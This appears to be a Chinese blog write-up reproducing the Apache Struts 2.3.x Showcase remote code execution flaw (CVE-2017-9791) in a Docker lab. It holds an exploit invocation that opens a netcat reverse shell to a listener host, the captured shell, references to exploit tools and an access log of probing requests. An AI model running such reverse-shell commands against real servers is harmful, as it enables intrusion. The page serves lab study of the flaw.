Apache Struts 2.3.x Showcase - Remote Code Execution漏洞分析

最新推荐文章于 2023-06-28 08:51:09 发布
最新推荐文章于 2023-06-28 08:51:09 发布
阅读量859 收藏
点赞数
分类专栏: 漏洞复现分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cwtv123/article/details/77367845
版权

0x01环境:
Linux f39e3e6b024a 3.13.0-61-generic #100-Ubuntu SMP Wed Jul 29 11:21:34 UTC 2015 x86_64 GNU/Linux
Docker
tomcat:9.0
Apache Struts 2.3.x Showcase

docker/
├── tomcat
│ └── Dockerfile
└── webapps
├── struts2-showcase
└── struts2-showcase.war

部署环境:

Dockerfile:
FROM tomcat:9.0
1、docker build -t eva/tomcat ./tomcat/
2、docker run -d -p 8080:8080 -v /root/docker/webapps/:/usr/local/tomcat/webapps -it eva/tomcat
为了导入不同的struts,采用挂载方式持久化webapps。方便切换struts版本
3、docker exec -it clever_wright /bin/bash

struts2.3.x访问方式

http://10.160.11.191:8080/struts2-showcase/index.action#

0x02Poc


    # $ ncat -v -l -p 4444 &
    # $ python CVE-2017-9791.py http://10.160.11.191:8080/struts2-showcase/integration/saveGangster.action "netcat -e /bin/bash 10.160.11.194 4444"

漏洞成功利用:

root@kali:~/ctf# netcat -v -l -p 4444
listening on [any] 4444 ...
10.160.11.191: inverse host lookup failed: Unknown host
connect to [10.160.11.194] from (UNKNOWN) [10.160.11.191] 33823
cat etc/issue
Debian GNU/Linux 9 \n \l
四盘山
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Struts Showcase
08-14
struts2.0自带,不错的例子哦.
apache struts2 remote code execute
cnbird's blog
08-23 1394
this method was published at xcon2012 xcon.xfocus.net. kxlzx http://www.inbreak.net flow this and step by step: 1, down load struts2-showcase from struts.apache.org 2, run struts2-showcase. 3
struts2.0官方项目之四(showcase)
08-26
<br>struts2.0官方项目之四(showcase)<br><br>===================================================<br>Struts2.0官方项目共4个,名字如下:<br><br>blank<br>mailreader<br>portlet<br>showcase<br><br>这4个官方项目都收录在本人(ljwfbf)的资源中!<br>--全部免费下载!希望大家都能够从中获益!<br>===================================================<br>(以“mailreader”为例说明)<br><br>一.查看源码的方法:<br> *把解压后的war文件改为rar文件,使用解压工具(如:winRAR)解压就 <br><br> 可以了!<br> ------------------------------------------------<br> 实例说明:<br><br> 将<br><br> “struts2-mailreader-2.0.9.war”<br><br> 改为<br><br> “struts2-mailreader-2.0.9.rar”<br><br> 使用解压工具解压-->成功!<br> ------------------------------------------------<br><br>===================================================<br><br>二.在Tomcat下的运行方法:<br><br> 把解压后的war文件(如:“struts2-mailreader-2.0.9.war”)<br> 1.放到tomcat的webapps目录下<br> 2.启动tomcat<br> 3.在IE浏览器中输入:<br> http://localhost:8080/struts2-mailreader-2.0.9.war<br><br> 恭喜,运行成功!<br><br> ------------------------------------------------<br> 除了Tomcat外,当然使用其他的服务器也可以运行!<br> ------------------------------------------------<br>===================================================
修改struts2-showcase动态树,改由从数据表中读取,并且用递归方式生成
getCool
01-22 136
系统采用Struts2+Spring+Hibernate架构,classpath分层结构如下图:   表结构如下图:   表映射为pojo为类Tree.java代码如下: private Integer id; private String name; private String children; private Tree parent; public Tree() { ...
struts2.1.6的showcase无法运行!
jhacker7的专栏
01-14 160
用tomcat6.0.13吧, 6.0.18可能不好使.  原因不明. 知道的告诉我下, 谢了.
Struts2漏洞检查工具2019版 V2.3.exe
01-16
S2-048 CVE-2017-9791 Struts 2.3.X http://127.0.0.1:8090/struts2-showcase/integration/saveGangster.action 影响范围非常小 S2-046 CVE-2017-5638 Struts 2.3.5-2.3.31,Struts 2.5-2.5.10 ...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
Struts2.3.16.3官方实例,4个
11-03
这四个war文件分别是struts2-showcasestruts2-portlet、struts2-rest-showcasestruts2-mailreader,每个实例都包含了不同的功能和应用场景,下面将逐一详细介绍这些实例及其背后的Struts2核心知识点。...
struts2-showcase.rar
03-03
Struts2-showcase是一个用于演示和学习Apache Struts2框架功能的开源项目。这个压缩包“struts2-showcase.rar”包含了完整的源代码,旨在帮助开发者深入理解Struts2框架的工作原理及其各种特性。以下是对Struts2和...
struts2-showcase.war
01-31
struts2-showcase.war
Struts2漏洞检查工具2017版.zip
07-24
警告: 本工具为漏洞自查工具,请勿非法攻击他人网站! Struts2漏洞检查工具2017版 V2.0 by 安恒信息应急响应中心。支持S2-032,S2-037,S2-016,S2-019,S2-045,S2-046,S2-048漏洞验证。有对漏洞的命令执行功能、文件上传功能。还有批量验证功能。增加S2-046,官方发布S2-046和S2-045漏洞引发原因一样,只是利用漏洞的位置发生了变化,S2-046方式可能绕过部分WAF防护,存在S2-045就存在S2-046。增加S2-048 Struts 2.3.X,支持检查官方示例struts2-showcase应用的代码执行漏洞。增加安恒信息研究员nike.zheng发现的S2-045。jakatar处理复杂数据类型时,异常处理不当,导致OGNL代码执行,通过在请求的Content-Type头中构造OGNL表达式来执行Java代码。
struts2自带项目showcase的tags学习笔记
铁血蓝狮
07-26 614
[size=x-large]struts2自带项目showcase的tags学习笔记[/size] [size=x-large]第一[/size]、首先我们来看non-ui的标签。 有几个需要注意的地方: [size=large]1.actionTag[/size] [code="java"][/code] 这里的action并不是存在于url或是form中,而是直接一个单独的标签,...
struts2的demo中show case的crud示例
yq76034150的专栏
05-09 1515
        开始再看这个crud示例时,居然发现我没有准备数据库信息及数据也可以运行成功,后来看了实现才明白,该示例使用了Map模拟数据库存储操作数据,不过struts2的实现还是又可以观飨的地方,下面就看看它的实现。        首先,定义持久类存储接口Storage:public interface Storage extends Serializable ...{    IdE
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9481
前言: 本篇文章中复现的漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: StrutsApache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
Struts2最全面的远程命令执行漏洞梳理
LuoOpening的博客
03-29 835
OGNL的全称是对象图导航语言( Object-Graph Navigation Language),它是一种用于获取和设置 Java对象属性的开源表达式语言,以及其他附加功能,是Struts2的默认表达式语言。使用这种表达式语言,可以利用表达式语法树规则,存储Java对象的任意属性,调用Java对象的方法,同时能够自动实现期望的类型转换。OGNL最初是作为一种使用属性名称在UI组件和控制器之间建立关联的方法。
Apache Struts2远程代码执行漏洞(S2-001)复现
m0_58606546的博客
01-14 2438
0x01 漏洞概述 1、漏洞名称 漏洞名称:Struts Remote Code Exploit 漏洞编号:Struts2-001 漏洞类型:Remote Code Execution 2、漏洞原理 Struts2 是流行和成熟的基于 MVC 设计模式的 Web 应用程序框架。 Struts2 不只是 Struts1 下一个版本,它是一个完全重写的 Struts 架构。Struts2 的标签中使用的是OGNL表达式,OGNL 是 Object Graphic Navigation Language(
Apache Struts2--048远程代码执行漏洞复现
m0_48520508的博客
12-28 603
0x00简介 Struts2框架是一个用于开发Java EE网络应用程序的开放源代码网页应用程序架构。它利用并延伸了Java Servlet API,鼓励开发者采用MVC架构。Struts2以WebWork优秀的设计思想为核心,吸收了Struts框架的部分优点,提供了一个更加整洁的MVC设计模式实现的Web应用程序框架。 0x01漏洞概述 Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当A.
Apache Struts2 远程命令执行漏洞
weixin_34075268的博客
07-19 276
本人WEB***不行,最近在SARS大牛的指导下正在飞速成长。记录下成长的点滴。在ApacheStruts2.3.15.1版本(北京时间:2013-07-15)发布的时候,公开了一个新的远程命令执行漏洞,允许***者在访问使用Struts2的应用时远程执行OGNL表达式,该漏洞影响2.3.15.1之前的所有Struts2版本。影响版本:ApacheStruts22....
Java学习记录之struts2(一)
wchg21131的博客
06-28 98
 框架:就是半成品,框架已经完成一些通用功能。只需要实现与业务有关功能。 版本:struts-2.3.15.3-all jar位置:struts-2.3.15.3\apps\struts2-blank\WEB-INF\libdefault.properties :用于配置struts 常量。例如:编码struts-default.xml :struts提供的默认核心配置文件,struts大部分功能都在此配置文件中。
192.168.85.1 - - [26/Jun/2022:06:07:07 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 24 192.168.85.1 - - [26/Jun/2022:06:07:11 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 24 192.168.85.1 - - [26/Jun/2022:06:07:11 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 24 192.168.85.1 - - [26/Jun/2022:06:07:11 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 200 12925 192.168.85.1 - - [26/Jun/2022:06:07:11 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 200 12925 192.168.85.1 - - [26/Jun/2022:06:07:11 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 200 12925 192.168.85.1 - - [26/Jun/2022:06:07:11 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 200 14 192.168.85.1 - - [26/Jun/2022:06:08:06 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 15 192.168.85.1 - - [26/Jun/2022:06:08:16 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 1227 192.168.85.1 - - [26/Jun/2022:06:10:15 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 79 192.168.85.1 - - [26/Jun/2022:06:13:25 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 404 752 192.168.85.1 - - [26/Jun/2022:06:16:42 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 35 192.168.85.1 - - [26/Jun/2022:06:16:57 -0400] "GET //struts2-showcase/hhh.jsp HTTP/1.1" 403 642 192.168.85.1 - - [26/Jun/2022:06:18:55 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 35 192.168.85.1 - - [26/Jun/2022:06:19:02 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 35 192.168.85.1 - - [26/Jun/2022:06:19:09 -0400] "GET //struts2-showcase/hhh1.jsp HTTP/1.1" 403 642 192.168.85.1 - - [26/Jun/2022:06:19:34 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 400 192.168.85.1 - - [26/Jun/2022:06:20:37 -0400] "POST /struts2-showcase/index.action HTTP/1.1" 500 5 192.168.85.1 - - [26/Jun/2022:06:20:42 -0400] "GET //struts2-showcase/hhh1.jsp HTTP/1.1" 403 642 192.168.85.1 - - [26/Jun/2022:06:20:46 -0400] "GET //struts2-showcase/hhh.jsp HTTP/1.1" 403 642 192.168.85.1 - - [26/Jun/2022:06:20:51 -0400] "GET /struts2-showcase/hhh.jsp HTTP/1.1" 403 642
最新发布
07-12
根据您提供的日志信息,可以看出在2022年6月26日的几个时间点,IP地址为192.168.85.1的主机对"/struts2-showcase/index.action"进行了多次POST请求,并且返回的HTTP状态码大部分为500。此外,还有一些GET请求的目标...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值